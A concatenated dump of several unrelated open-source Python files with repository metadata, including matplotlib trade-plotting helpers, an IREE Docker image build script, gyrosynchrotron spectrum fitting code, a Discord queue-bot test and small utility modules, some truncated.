            #xlabel="Date",
            )
    ax2.grid(axis='y')
    ax2.xaxis.set_major_formatter(MyFormatter(idx_dt, '%y-%m-%d'))  # 17-09-31
    fig.tight_layout()
    return fig
def plot_brinson(df, save_folder):
    """
    Plot the Brinson attribution components over time and save the figure
    as ``brinson_attribution.png`` in *save_folder*.
    Parameters
    ----------
    df : pd.DataFrame
        Must contain 'allocation', 'selection', 'interaction' and
        'total_active' columns indexed by date.
    save_folder : str
        Output directory for the PNG file.
    """
    allo, selec, inter, total = df['allocation'], df['selection'], df['interaction'], df['total_active']
    fig, ax1 = plt.subplots(1, 1, figsize=(21, 8))
    idx0 = df.index
    idx = range(len(idx0))
    ax1.plot(idx, selec, lw=1.5, color='indianred', label='Selection Return')
    ax1.plot(idx, allo, lw=1.5, color='royalblue', label='Allocation Return')
    ax1.plot(idx, inter, lw=1.5, color='purple', label='Interaction Return')
    # ax1.plot(idx, total, lw=1.5, ls='--', color='k', label='Total Active Return')
    ax1.axhline(0.0, color='k', lw=0.5, ls='--')
    ax1.legend(loc='upper left')
    ax1.set_xlabel("Date")
    ax1.set_ylabel("Return")
    ax1.xaxis.set_major_formatter(MyFormatter(idx0, '%Y-%m-%d'))
    plt.tight_layout()
    fig.savefig(os.path.join(save_folder, 'brinson_attribution.png'))
    # Close to free figure memory when called in batch.
    plt.close()
def calc_avg_pos_price(pos_arr, price_arr):
    """
    Calculate the running average cost price from positions and fill prices.

    The cost basis is updated only when the position is opened or increased
    in the direction of the existing position; reducing a position keeps the
    previous cost. A flat position (0) has cost price 0, except at the first
    bar, where the cost is seeded with the first price.

    Parameters
    ----------
    pos_arr : np.ndarray
        Position per bar (signed).
    price_arr : np.ndarray
        Fill/close price per bar; same length as ``pos_arr``.

    Returns
    -------
    np.ndarray
        Average cost price per bar (float).
    """
    assert len(pos_arr) == len(price_arr)
    cost = np.zeros_like(pos_arr, dtype=float)
    cost[0] = price_arr[0]
    for k in range(1, pos_arr.shape[0]):
        cur = pos_arr[k]
        if cur == 0:
            # Flat position has no cost basis.
            cost[k] = 0.0
            continue
        prev = pos_arr[k - 1]
        delta = cur - prev
        # The basis changes when opening from flat or adding in the same
        # direction; otherwise (partial close / flip) it is carried forward.
        if prev == 0 or delta * prev > 0:
            cost[k] = (cost[k - 1] * prev + delta * price_arr[k]) / cur
        else:
            cost[k] = cost[k - 1]
    return cost
def plot_trades(df, symbol="", save_folder='.', marker_size_adjust_ratio=0.1):
    """
    Plot price with buy/sell markers, average cost, cumulative PnL (twin axis)
    and position for one symbol; save the figure as ``<symbol>.png``.
    Parameters
    ----------
    df : pd.DataFrame
        Daily data with columns 'close', 'BuyVolume', 'SellVolume',
        'CumProfit', 'AvgPosPrice' and 'position', indexed by date.
    symbol : str
        Used in titles and the output file name.
    save_folder : str
        Output directory for the PNG.
    marker_size_adjust_ratio : float
        Unused in this implementation — kept for interface compatibility.
    """
    # Temporarily apply the module's plotting style; restored at the end.
    old_mpl_rcparams = {k: v for k, v in mpl.rcParams.items()}
    mpl.rcParams.update(MPL_RCPARAMS)
    idx0 = df.index
    idx = range(len(idx0))
    price = df.loc[:, 'close']
    bv, sv = df.loc[:, 'BuyVolume'].values, df.loc[:, 'SellVolume'].values
    profit = df.loc[:, 'CumProfit'].values
    avgpx = df.loc[:, 'AvgPosPrice']
    # Normalize marker sizes so the largest trade maps to size 100.
    bv_m = np.max(bv)
    sv_m = np.max(sv)
    if bv_m > 0:
        bv = bv / bv_m * 100
    if sv_m > 0:
        sv = sv / sv_m * 100
    # Top 3/4: price + trades + PnL; bottom 1/4: position.
    fig = plt.figure(figsize=(14, 10))
    ax1 = plt.subplot2grid((4, 1), (0, 0), rowspan=3)
    ax3 = plt.subplot2grid((4, 1), (3, 0), rowspan=1, sharex=ax1)
    ax2 = ax1.twinx()
    ax1.plot(idx, price, label='Price', linestyle='-', lw=1, marker='', color='yellow')
    ax1.scatter(idx, price, label='buy', marker='o', s=bv, color='indianred')
    ax1.scatter(idx, price, label='sell', marker='o', s=sv, color='forestgreen')
    ax1.plot(idx, avgpx, lw=1, marker='', color='green')
    ax1.legend(loc='upper left')
    ax1.set(title="Price, Trades and PnL for {:s}".format(symbol), ylabel="Price ($)")
    ax1.xaxis.set_major_formatter(MyFormatter(idx0, '%Y-%m'))
    ax2.plot(idx, profit, label='PnL', color='k', lw=1, ls='--', alpha=.4)
    ax2.legend(loc='upper right')
    ax2.set(ylabel="Profit / Loss ($)")
    # ax1.xaxis.set_major_formatter(MyFormatter(df.index))#, '%H:%M'))
    ax3.plot(idx, df.loc[:, 'position'], marker='D', markersize=3, lw=2)
    ax3.axhline(0, color='k', lw=1, ls='--', alpha=0.8)
    ax3.set(title="Position of {:s}".format(symbol))
    fig.tight_layout()
    fig.savefig(save_folder + '/' + "{}.png".format(symbol), facecolor=fig.get_facecolor(), dpi=fig.get_dpi())
    # Restore the caller's global matplotlib configuration.
    mpl.rcParams.update(old_mpl_rcparams)
4682bbaf850d64b54a79c88a195b6f6e2f183e48 | 114 | py | Python | lightnet/data/transform/__init__.py | eavise-kul/lightnet | d2d5d3fff8f929c3683c34f176217649375b98e1 | [
"MIT"
] | 6 | 2019-10-10T05:42:50.000Z | 2022-02-27T04:59:29.000Z | lightnet/data/transform/__init__.py | eavise-kul/lightnet | d2d5d3fff8f929c3683c34f176217649375b98e1 | [
"MIT"
] | null | null | null | lightnet/data/transform/__init__.py | eavise-kul/lightnet | d2d5d3fff8f929c3683c34f176217649375b98e1 | [
"MIT"
] | 4 | 2020-01-25T20:16:23.000Z | 2021-04-29T13:02:34.000Z | #
# Lightnet data transforms
# Copyright EAVISE
#
from .pre import *
from .post import *
from .util import *
| 12.666667 | 28 | 0.684211 |
46830865694c3242ec731476bef2c0bab11ffa36 | 420 | py | Python | ufdl-core-app/src/ufdl/core_app/exceptions/_BadSource.py | waikato-ufdl/ufdl-backend | 776fc906c61eba6c2f2e6324758e7b8a323e30d7 | [
"Apache-2.0"
] | null | null | null | ufdl-core-app/src/ufdl/core_app/exceptions/_BadSource.py | waikato-ufdl/ufdl-backend | 776fc906c61eba6c2f2e6324758e7b8a323e30d7 | [
"Apache-2.0"
] | 85 | 2020-07-24T00:04:28.000Z | 2022-02-10T10:35:15.000Z | ufdl-core-app/src/ufdl/core_app/exceptions/_BadSource.py | waikato-ufdl/ufdl-backend | 776fc906c61eba6c2f2e6324758e7b8a323e30d7 | [
"Apache-2.0"
] | null | null | null | from rest_framework import status
from rest_framework.exceptions import APIException
| 28 | 60 | 0.719048 |
468313da2c3cc1e70694859bf5264667fcd82781 | 8,935 | py | Python | build_tools/docker/manage_images.py | BernhardRiemann/iree | 471349762b316f7d6b83eb5f9089255d78052758 | [
"Apache-2.0"
] | 1 | 2021-03-15T13:53:30.000Z | 2021-03-15T13:53:30.000Z | build_tools/docker/manage_images.py | BernhardRiemann/iree | 471349762b316f7d6b83eb5f9089255d78052758 | [
"Apache-2.0"
] | null | null | null | build_tools/docker/manage_images.py | BernhardRiemann/iree | 471349762b316f7d6b83eb5f9089255d78052758 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Manages IREE Docker image definitions.
Includes information on their dependency graph and GCR URL.
Example usage:
Rebuild the cmake image and all images that transitiviely on depend on it,
tagging them with `latest`:
python3 build_tools/docker/manage_images.py --build --image cmake
Print out output for rebuilding the cmake image and all images that
transitiviely on depend on it, but don't take side-effecting actions:
python3 build_tools/docker/manage_images.py --build --image cmake --dry-run
Push all `prod` images to GCR:
python3 build_tools/docker/manage_images.py --push --tag prod --images all
Rebuild and push all images and update references to them in the repository:
python3 build_tools/docker/manage_images.py --push --images all
--update-references
"""
import argparse
import fileinput
import os
import posixpath
import re
import subprocess
import sys
# GCR project prefix and the repo-relative directory holding the Dockerfiles.
IREE_GCR_URL = 'gcr.io/iree-oss/'
DOCKER_DIR = 'build_tools/docker/'
# Map from image names to images that they depend on.
IMAGES_TO_DEPENDENCIES = {
    'base': [],
    'bazel': ['base', 'util'],
    'bazel-python': ['bazel'],
    'bazel-tensorflow': ['bazel-python'],
    'bazel-tensorflow-nvidia': ['bazel-tensorflow-vulkan'],
    'bazel-tensorflow-swiftshader': ['bazel-tensorflow-vulkan', 'swiftshader'],
    'bazel-tensorflow-vulkan': ['bazel-tensorflow'],
    'cmake': ['base', 'util'],
    'cmake-android': ['cmake', 'util'],
    'cmake-python': ['cmake'],
    'cmake-python-nvidia': ['cmake-python-vulkan'],
    'cmake-python-swiftshader': ['cmake-python-vulkan', 'swiftshader'],
    'cmake-python-vulkan': ['cmake-python'],
    'rbe-toolchain': [],
    'swiftshader': ['cmake'],
    'util': [],
}
# Inverted map: image -> images that depend on it (used to find images that
# must be rebuilt when a dependency changes).
IMAGES_TO_DEPENDENT_IMAGES = {k: [] for k in IMAGES_TO_DEPENDENCIES}
for image, dependencies in IMAGES_TO_DEPENDENCIES.items():
  for dependency in dependencies:
    IMAGES_TO_DEPENDENT_IMAGES[dependency].append(image)
# Human-readable list of valid image names for --help / error messages.
IMAGES_HELP = [f'`{name}`' for name in IMAGES_TO_DEPENDENCIES]
IMAGES_HELP = f'{", ".join(IMAGES_HELP)} or `all`'
def parse_arguments():
  """Parses command-line options.

  Returns:
    The parsed argparse.Namespace. `args.images` is validated against
    IMAGES_TO_DEPENDENCIES, and `all` is expanded to every known image
    (sorted for determinism). Invalid image names terminate the program
    via `parser.error`.
  """
  parser = argparse.ArgumentParser(
      description="Build IREE's Docker images and optionally push them to GCR.")
  parser.add_argument(
      '--images',
      '--image',
      type=str,
      required=True,
      action='append',
      help=f'Name of the image to build: {IMAGES_HELP}.')
  parser.add_argument(
      '--tag',
      type=str,
      default='latest',
      help='Tag for the images to build. Defaults to `latest` (which is good '
      'for testing changes in a PR). Use `prod` to update the images that the '
      'CI caches.')
  parser.add_argument(
      '--pull',
      action='store_true',
      help='Pull the specified image before building.')
  parser.add_argument(
      '--build',
      action='store_true',
      help='Build new images from the current Dockerfiles.')
  parser.add_argument(
      '--push',
      action='store_true',
      help='Push the built images to GCR. Requires gcloud authorization.')
  parser.add_argument(
      '--update_references',
      '--update-references',
      action='store_true',
      help='Update all references to the specified images to point at the new'
      ' digest.')
  parser.add_argument(
      '--dry_run',
      '--dry-run',
      '-n',
      action='store_true',
      help='Print output without building or pushing any images.')
  args = parser.parse_args()
  # Validate every requested image. Iterate over a snapshot because
  # `args.images` is replaced in place when `all` is encountered.
  for image in list(args.images):
    if image == 'all':
      # Sort for a deterministic order.
      args.images = sorted(IMAGES_TO_DEPENDENCIES.keys())
    elif image not in IMAGES_TO_DEPENDENCIES:
      # parser.error prints the usage message and exits the program. The
      # previous code wrapped this call in `raise`, which was dead code
      # (and misleading) since error() never returns.
      parser.error('Expected --image to be one of:\n'
                   f'  {IMAGES_HELP}\n'
                   f'but got `{image}`.')
  return args
if __name__ == '__main__':
  # Entry point: pull/build/push Docker images and update digest references.
  # Helper functions (stream_command, check_stream_command,
  # get_ordered_images_to_process, get_repo_digest, update_rbe_reference,
  # update_references) are defined elsewhere in this file.
  args = parse_arguments()
  # Ensure the user has the correct authorization if they try to push to GCR.
  if args.push:
    if stream_command(['which', 'gcloud']) != 0:
      print('gcloud not found.'
            ' See https://cloud.google.com/sdk/install for installation.')
      sys.exit(1)
    check_stream_command(['gcloud', 'auth', 'configure-docker'],
                         dry_run=args.dry_run)
  # Expand the requested images to include everything that depends on them,
  # in dependency order.
  images_to_process = get_ordered_images_to_process(args.images)
  print(f'Also processing dependent images. Will process: {images_to_process}')
  for image in images_to_process:
    print(f'Processing image {image}')
    image_name = posixpath.join(IREE_GCR_URL, image)
    image_tag = f'{image_name}:{args.tag}'
    image_path = os.path.join(DOCKER_DIR, image)
    if args.pull:
      check_stream_command(['docker', 'pull', image_tag], dry_run=args.dry_run)
    if args.build:
      check_stream_command(['docker', 'build', '--tag', image_tag, image_path],
                           dry_run=args.dry_run)
    if args.push:
      check_stream_command(['docker', 'push', image_tag], dry_run=args.dry_run)
    if args.update_references:
      # Point repository references at the content digest of the pushed image.
      digest = get_repo_digest(image_tag)
      # Just hardcode this oddity
      if image == 'rbe-toolchain':
        update_rbe_reference(digest, dry_run=args.dry_run)
      update_references(image_name, digest, dry_run=args.dry_run)
| 32.140288 | 80 | 0.675993 |
4684141f6543556bf465b101be71f060f3b08131 | 27,570 | py | Python | suncasa/pygsfit/gsutils.py | wyq24/suncasa | e6ed6d8b9bd2186c4af6d0354d03af5fff9aef7a | [
"BSD-2-Clause"
] | null | null | null | suncasa/pygsfit/gsutils.py | wyq24/suncasa | e6ed6d8b9bd2186c4af6d0354d03af5fff9aef7a | [
"BSD-2-Clause"
] | null | null | null | suncasa/pygsfit/gsutils.py | wyq24/suncasa | e6ed6d8b9bd2186c4af6d0354d03af5fff9aef7a | [
"BSD-2-Clause"
] | null | null | null | import numpy as np
# import sys
import math
import os, sys, platform
import astropy.units as u
from sunpy import map as smap
from astropy.coordinates import SkyCoord
from suncasa.io import ndfits
import lmfit
from astropy.time import Time
import matplotlib.pyplot as plt
import matplotlib.colors as colors
import matplotlib.colorbar as colorbar
from suncasa.utils import mstools
from suncasa.utils import qlookplot as ql
from mpl_toolkits.axes_grid1 import make_axes_locatable
from tqdm import tqdm
from astropy.io import fits
import numpy.ma as ma
sys.path.append(os.path.dirname(os.path.realpath(__file__)))
import gstools
# name of the fast gyrosynchrotron codes shared library, selected per platform.
# NOTE(review): on any other platform (e.g. an unrecognized OS) `libname` is
# never assigned and later use raises NameError — confirm this is acceptable.
if platform.system() == 'Linux' or platform.system() == 'Darwin':
    libname = os.path.join(os.path.dirname(os.path.realpath(__file__)),
                           'binaries/MWTransferArr.so')
if platform.system() == 'Windows':
    libname = os.path.join(os.path.dirname(os.path.realpath(__file__)),
                           'binaries/MWTransferArr64.dll')
def mwspec2min_1src(params, freqghz, tb=None, tb_err=None, arcsec2cm=0.725e8, showplt=False):
    '''
    Compute a single-source gyrosynchrotron microwave spectrum with the fast
    GS codes and (optionally) its residual against observed brightness
    temperatures, for use as an lmfit objective function.

    params: lmfit.Parameters; must contain ssz (source area, arcsec^2),
        depth (LOS depth, arcsec), Bmag (G), Tth (MK), nth (1e10 cm^{-3}),
        lognrlh (log10 nonthermal density above 0.1 MeV), delta (powerlaw
        index), theta (viewing angle, deg), Emin/Emax (MeV)
    freqghz: frequencies in GHz at which the model is evaluated
    tb: reference brightness temperature in K (None -> return model Tb)
    tb_err: uncertainties of reference brightness temperature in K
        (None -> return plain difference model - tb)
    arcsec2cm: arcsec-to-cm conversion at the source (default ~1 AU)
    showplt: if True, plot the computed total-intensity spectrum
    '''
    from scipy import interpolate
    GET_MW = gstools.initGET_MW(libname)  # load the fast GS shared library
    # Unpack fit parameters.
    ssz = float(params['ssz'].value)  # source area in arcsec^2
    depth = float(params['depth'].value)  # total source depth in arcsec
    Bmag = float(params['Bmag'].value)  # magnetic field strength in G
    Tth = float(params['Tth'].value)  # thermal temperature in MK
    nth = float(params['nth'].value)  # thermal density in 1e10 cm^{-3}
    nrlh = 10. ** float(params['lognrlh'].value)  # total nonthermal density above 0.1 MeV
    delta = float(params['delta'].value)  # powerlaw index
    theta = float(params['theta'].value)  # viewing angle in degrees
    Emin = float(params['Emin'].value)  # low energy cutoff of nonthermal electrons in MeV
    Emax = float(params['Emax'].value)  # high energy cutoff of nonthermal electrons in MeV
    E_hi = 0.1
    # Rescale the nonthermal density from "above E_hi" to the [Emin, Emax]
    # range assuming a single powerlaw with n(>E) ~ E^(1 - delta).
    # BUGFIX: the second term of the numerator used to be `Emax * (1. - delta)`
    # (a multiplication); it must be the power `Emax ** (1. - delta)`,
    # matching the denominator and the parallel expression for A below.
    nrl = nrlh * (Emin ** (1. - delta) - Emax ** (1. - delta)) / (E_hi ** (1. - delta) - Emax ** (1. - delta))
    # Grid sizes for the GS code.
    Nf = 100  # number of frequencies
    NSteps = 1  # number of nodes along the line-of-sight
    N_E = 15  # number of energy nodes
    N_mu = 15  # number of pitch-angle nodes
    Lparms = np.zeros(11, dtype='int32')  # array of dimensions etc.
    Lparms[0] = NSteps
    Lparms[1] = Nf
    Lparms[2] = N_E
    Lparms[3] = N_mu
    Rparms = np.zeros(5, dtype='double')  # array of global floating-point parameters
    Rparms[0] = ssz * arcsec2cm ** 2  # Area, cm^2
    Rparms[1] = 1e9  # starting frequency to calculate spectrum, Hz
    Rparms[2] = 0.02  # logarithmic step in frequency
    Rparms[3] = 12  # f^C
    Rparms[4] = 12  # f^WH
    ParmLocal = np.zeros(24, dtype='double')  # array of voxel parameters - for a single voxel
    ParmLocal[0] = depth * arcsec2cm / NSteps  # voxel depth, cm
    ParmLocal[1] = Tth * 1e6  # T_0, K
    ParmLocal[2] = nth * 1e10  # n_0 - thermal electron density, cm^{-3}
    ParmLocal[3] = Bmag  # B - magnetic field, G
    Parms = np.zeros((24, NSteps), dtype='double', order='F')  # 2D array of input parameters - for multiple voxels
    for i in range(NSteps):
        Parms[:, i] = ParmLocal  # most of the parameters are the same in all voxels
        Parms[4, i] = theta  # uniform viewing angle along the LOS
    # parameters of the electron distribution function
    n_b = nrl  # n_b - nonthermal electron density, cm^{-3}
    mu_c = np.cos(np.pi * 70 / 180)  # loss-cone boundary
    dmu_c = 0.2  # Delta_mu
    E_arr = np.logspace(np.log10(Emin), np.log10(Emax), N_E, dtype='double')  # energy grid (logarithmically spaced)
    mu_arr = np.linspace(-1.0, 1.0, N_mu, dtype='double')  # pitch-angle grid
    f0 = np.zeros((N_E, N_mu), dtype='double')  # 2D distribution function array - for a single voxel
    # computing the distribution function (equivalent to PLW & GLC)
    A = n_b / (2.0 * np.pi) * (delta - 1.0) / (Emin ** (1.0 - delta) - Emax ** (1.0 - delta))
    B = 0.5 / (mu_c + dmu_c * np.sqrt(np.pi) / 2 * math.erf((1.0 - mu_c) / dmu_c))
    for i in range(N_E):
        for j in range(N_mu):
            amu = abs(mu_arr[j])
            # Powerlaw in energy times a Gaussian loss-cone in pitch angle.
            f0[i, j] = A * B * E_arr[i] ** (-delta) * (1.0 if amu < mu_c else np.exp(-((amu - mu_c) / dmu_c) ** 2))
    f_arr = np.zeros((N_E, N_mu, NSteps), dtype='double',
                     order='F')  # 3D distribution function array - for multiple voxels
    for k in range(NSteps):
        f_arr[:, :, k] = f0  # electron distribution function is the same in all voxels
    RL = np.zeros((7, Nf), dtype='double', order='F')  # input/output array
    # calculating the emission for array distribution (array -> on)
    res = GET_MW(Lparms, Rparms, Parms, E_arr, mu_arr, f_arr, RL)
    if res:
        # retrieving the results: frequency grid and L/R circular intensities
        f = RL[0]
        I_L = RL[5]
        I_R = RL[6]
        if showplt:
            import matplotlib.pyplot as plt
            fig, ax = plt.subplots(1, 1)
            ax.plot(f, I_L + I_R)
            ax.set_xscale('log')
            ax.set_yscale('log')
            ax.set_title('Total intensity (array)')
            ax.set_xlabel('Frequency, GHz')
            ax.set_ylabel('Intensity, sfu')
        # Total flux; the small floor (1e-11) keeps log10 finite below.
        flx_model = I_L + I_R
        flx_model = np.nan_to_num(flx_model) + 1e-11
        # Interpolate the model (in log-log space) onto the requested
        # frequencies, then convert flux to brightness temperature.
        logf = np.log10(f)
        logflx_model = np.log10(flx_model)
        logfreqghz = np.log10(freqghz)
        interpfunc = interpolate.interp1d(logf, logflx_model, kind='linear')
        logmflx = interpfunc(logfreqghz)
        mflx = 10. ** logmflx
        mtb = sfu2tb(np.array(freqghz) * 1.e9, mflx, ssz)
    else:
        # NOTE: on failure mtb stays undefined and the code below raises
        # UnboundLocalError (preserved from the original behavior).
        print("Calculation error!")
    if tb is None:
        return mtb
    if tb_err is None:
        return mtb - tb
    # Error-weighted residual for least-squares minimization.
    residual = (mtb - tb) / tb_err
    return residual
| 40.784024 | 145 | 0.551904 |
4685248be49c1c014500014593ebd58e99994652 | 1,496 | py | Python | msgvis/apps/questions/migrations/0001_initial.py | hds-lab/textvis-drg | bfb136b6105df84fb6c1c89cc595bf9e9f22c5fe | [
"MIT"
] | 10 | 2015-12-04T07:43:11.000Z | 2021-01-23T00:44:56.000Z | msgvis/apps/questions/migrations/0001_initial.py | hds-lab/textvis-drg | bfb136b6105df84fb6c1c89cc595bf9e9f22c5fe | [
"MIT"
] | 200 | 2015-02-11T05:41:57.000Z | 2015-11-13T03:47:25.000Z | msgvis/apps/questions/migrations/0001_initial.py | hds-lab/textvis-drg | bfb136b6105df84fb6c1c89cc595bf9e9f22c5fe | [
"MIT"
] | 6 | 2015-10-02T18:01:09.000Z | 2021-01-23T00:44:58.000Z | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
| 36.487805 | 114 | 0.556818 |
4685622823bb3cb792b6697fa854e6d940a37ece | 7,412 | py | Python | test/test_check_alert.py | russ-lewis/cs120-queuebot | 6b121ef9b0d7db7bbb1810f71129d995ce6a1659 | [
"MIT"
] | null | null | null | test/test_check_alert.py | russ-lewis/cs120-queuebot | 6b121ef9b0d7db7bbb1810f71129d995ce6a1659 | [
"MIT"
] | null | null | null | test/test_check_alert.py | russ-lewis/cs120-queuebot | 6b121ef9b0d7db7bbb1810f71129d995ce6a1659 | [
"MIT"
] | 1 | 2021-05-18T02:32:54.000Z | 2021-05-18T02:32:54.000Z | import io
import sys
import unittest
import asyncio
import random
from contextlib import redirect_stdout
from .utils import *
from queuebot import QueueBot, QueueConfig, DiscordUser
config = {
"SECRET_TOKEN": "NOONEWILLEVERGUESSTHISSUPERSECRETSTRINGMWAHAHAHA",
"TA_ROLES": ["UGTA"],
"LISTEN_CHANNELS": ["join-queue"],
"CHECK_VOICE_WAITING": "False",
"VOICE_WAITING": "waiting-room",
"ALERT_ON_FIRST_JOIN": "True",
"VOICE_OFFICES": ["Office Hours Room 1", "Office Hours Room 2", "Office Hours Room 3"],
"ALERTS_CHANNEL": "queue-alerts",
}
config = QueueConfig(config, test_mode=True)
# TODO Comment each test case
if __name__ == '__main__':
unittest.main()
| 34.314815 | 91 | 0.625472 |
4685d4b1728860e781a678cd76d788dda6fe260b | 236 | py | Python | iam/__init__.py | dataday/aws-utilities-sdk | 7b1236f27a27e2830ccbbf905bbc05f864a1aecf | [
"MIT"
] | null | null | null | iam/__init__.py | dataday/aws-utilities-sdk | 7b1236f27a27e2830ccbbf905bbc05f864a1aecf | [
"MIT"
] | null | null | null | iam/__init__.py | dataday/aws-utilities-sdk | 7b1236f27a27e2830ccbbf905bbc05f864a1aecf | [
"MIT"
] | null | null | null | """
.. module:: aws_utilities_cli.iam
:platform: OS X
:synopsis: Small collection of utilities that
use the Amazon Web Services (AWS) SDK
.. moduleauthor:: dataday
"""
__all__ = ['generate_identity', 'generate_policy']
| 23.6 | 50 | 0.686441 |
46869ee7c4058bcc60c1e873b09ca6bac3bb10d7 | 2,556 | py | Python | tests/common/test_run/triangle_run.py | KnowingNothing/akg-test | 114d8626b824b9a31af50a482afc07ab7121862b | [
"Apache-2.0"
] | null | null | null | tests/common/test_run/triangle_run.py | KnowingNothing/akg-test | 114d8626b824b9a31af50a482afc07ab7121862b | [
"Apache-2.0"
] | null | null | null | tests/common/test_run/triangle_run.py | KnowingNothing/akg-test | 114d8626b824b9a31af50a482afc07ab7121862b | [
"Apache-2.0"
] | null | null | null | # Copyright 2019 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
from tests.common.tensorio import compare_tensor
from tests.common.test_op import triangle
from akg.utils import kernel_exec as utils
from tests.common.gen_random import random_gaussian
| 35.5 | 114 | 0.711659 |
4686dbf11ea2488f7a45d2ed0c1748432a5a0064 | 394 | py | Python | profiles/migrations/0018_auto_20180514_2106.py | brentfraser/geotabloid | 772106b2d39b5405045814b5f013ece5713469b1 | [
"MIT"
] | 2 | 2018-12-03T09:19:31.000Z | 2020-02-11T15:32:12.000Z | {{cookiecutter.project_slug}}/profiles/migrations/0018_auto_20180514_2106.py | brentfraser/cookiecutter-geopaparazzi-server | f9cd705991879deac67365007e9589142afc09bf | [
"BSD-3-Clause"
] | 2 | 2019-02-20T17:50:55.000Z | 2019-02-21T15:19:51.000Z | profiles/migrations/0018_auto_20180514_2106.py | GeoAnalytic-code/geotabloid | af017d470ef4553d5fbd24d865cb22ca643fd999 | [
"MIT"
] | 2 | 2018-10-19T17:07:01.000Z | 2021-01-13T06:54:55.000Z | # Generated by Django 2.0.3 on 2018-05-14 21:06
from django.db import migrations, models
| 20.736842 | 58 | 0.598985 |
46873638ac399bb3c28bf800bc92bbfd39940934 | 15,189 | py | Python | orio/main/tuner/tuner.py | parsabee/Orio | 64de0f7ee422483b60a9f02793472e20e864aa08 | [
"MIT"
] | 24 | 2015-01-26T03:14:19.000Z | 2021-09-27T23:10:12.000Z | orio/main/tuner/tuner.py | parsabee/Orio | 64de0f7ee422483b60a9f02793472e20e864aa08 | [
"MIT"
] | 30 | 2015-04-17T18:14:27.000Z | 2021-05-30T15:01:47.000Z | orio/main/tuner/tuner.py | parsabee/Orio | 64de0f7ee422483b60a9f02793472e20e864aa08 | [
"MIT"
] | 20 | 2015-02-11T08:20:19.000Z | 2022-01-15T17:55:00.000Z | #
# The tuner class to initiate the empirical performance tuning process
#
import re, sys, os
from orio.main.util.globals import *
import orio.main.dyn_loader, orio.main.tspec.tspec, orio.main.tuner.ptest_codegen, orio.main.tuner.ptest_driver
#--------------------------------------------------
# the name of the module containing various search algorithms
SEARCH_MOD_NAME = 'orio.main.tuner.search'
#--------------------------------------------------
| 43.397143 | 169 | 0.55448 |
46882caba8a1bc1cb57f8753adac56b5f9b622b8 | 1,862 | py | Python | verify_data.py | goowell/DrAdvice | d1f9d70671500599b3a36eb9c83390e39c521d25 | [
"MIT"
] | null | null | null | verify_data.py | goowell/DrAdvice | d1f9d70671500599b3a36eb9c83390e39c521d25 | [
"MIT"
] | null | null | null | verify_data.py | goowell/DrAdvice | d1f9d70671500599b3a36eb9c83390e39c521d25 | [
"MIT"
] | null | null | null | from transformer import *
from logger import logger
def verify_data(collection):
    """Scan every stored document and log each format violation found.

    A document is expected to look like
    ``{'_id': ..., 'd': {'info': [...], 'doctor_advice': [[...18 fields...], ...]}}``.
    Violations are logged; nothing is returned.
    """
    for doc in collection.find():
        record = doc.get('d')
        info = record.get('info')
        # Short patient info is only acceptable when the first field is '1'.
        if len(info) < 12 and info[0] != '1':
            logger.error('invalid patient info:' + doc['_id'] + str(info))
        advice_entries = record.get('doctor_advice')
        if len(advice_entries) == 0:
            logger.error('invalid doctor advice:' + doc['_id'])
        else:
            has_long, has_short = False, False
            for entry in advice_entries:
                # Every advice row must carry exactly 18 fields.
                if len(entry) != 18:
                    logger.error('invalid doctor advice:' + doc['_id'])
                    logger.error("invalid doctor advice: " + entry)
                # An empty 4th field marks a long-term advice, otherwise short-term.
                if entry[3] == '':
                    has_long = True
                else:
                    has_short = True
            # Each patient must have at least one long- and one short-term advice.
            if not (has_long and has_short):
                logger.error('invalid doctor advice: ' + doc['_id'] + ', long/short: {}/{}'.format(has_long, has_short))
def get_info(collection):
    """Print the split advice of the first document that has any advice.

    Documents without doctor advice are flagged; the first document that
    does have advice is split via ``split_all_ad`` and printed, then the
    scan stops.
    """
    for doc in collection.find():
        advice = doc.get('d').get('doctor_advice')
        if len(advice) == 0:
            print('invalid doctor advice:' + doc['_id'])
        else:
            print(split_all_ad(doc))
            break
def main():
    """Entry point: run ``find_missing`` and report the elapsed wall time."""
    from datetime import datetime
    from db import paients_source
    started_at = datetime.now()
    print('hello..')
    find_missing()
    print(datetime.now() - started_at)
if __name__ == '__main__':
main() | 29.09375 | 119 | 0.538131 |
46885ee1267724c58d93c90bd0626ea4f768c7c7 | 1,904 | py | Python | jvm-packages/cudautils.py | NVIDIA/spark-xgboost | 983159f52784e3d9dfd8e9957c5f8ca18e64f934 | [
"Apache-2.0"
] | 15 | 2020-06-11T02:20:26.000Z | 2022-03-09T07:18:23.000Z | jvm-packages/cudautils.py | NVIDIA/spark-xgboost | 983159f52784e3d9dfd8e9957c5f8ca18e64f934 | [
"Apache-2.0"
] | 4 | 2021-01-20T03:24:23.000Z | 2021-11-01T05:33:38.000Z | jvm-packages/cudautils.py | NVIDIA/spark-xgboost | 983159f52784e3d9dfd8e9957c5f8ca18e64f934 | [
"Apache-2.0"
] | 6 | 2020-06-24T03:28:58.000Z | 2021-10-01T16:04:11.000Z | #!/usr/bin/env python
import os
import re
import subprocess
import sys
# version -> classifier
# '' means default classifier
cuda_vers = {
'11.2': ['cuda11', '']
}
def check_classifier(classifier):
    """Validate a jar classifier against the locally detected CUDA version.

    Used by the maven build. Raises when *classifier* is not registered for
    the version reported by ``nvcc``.
    """
    detected = detect_cuda_ver()
    allowed = cuda_vers[detected]
    if classifier not in allowed:
        raise Exception("Jar classifier '{}' mismatches the 'nvcc' version {} !".format(classifier, detected))
def get_supported_vers():
    """Return the supported CUDA versions (the keys of the version table)."""
    supported = cuda_vers.keys()
    return supported
def get_supported_vers_str():
    """Return the supported CUDA versions as one space-separated string.

    Used by shell scripts.
    """
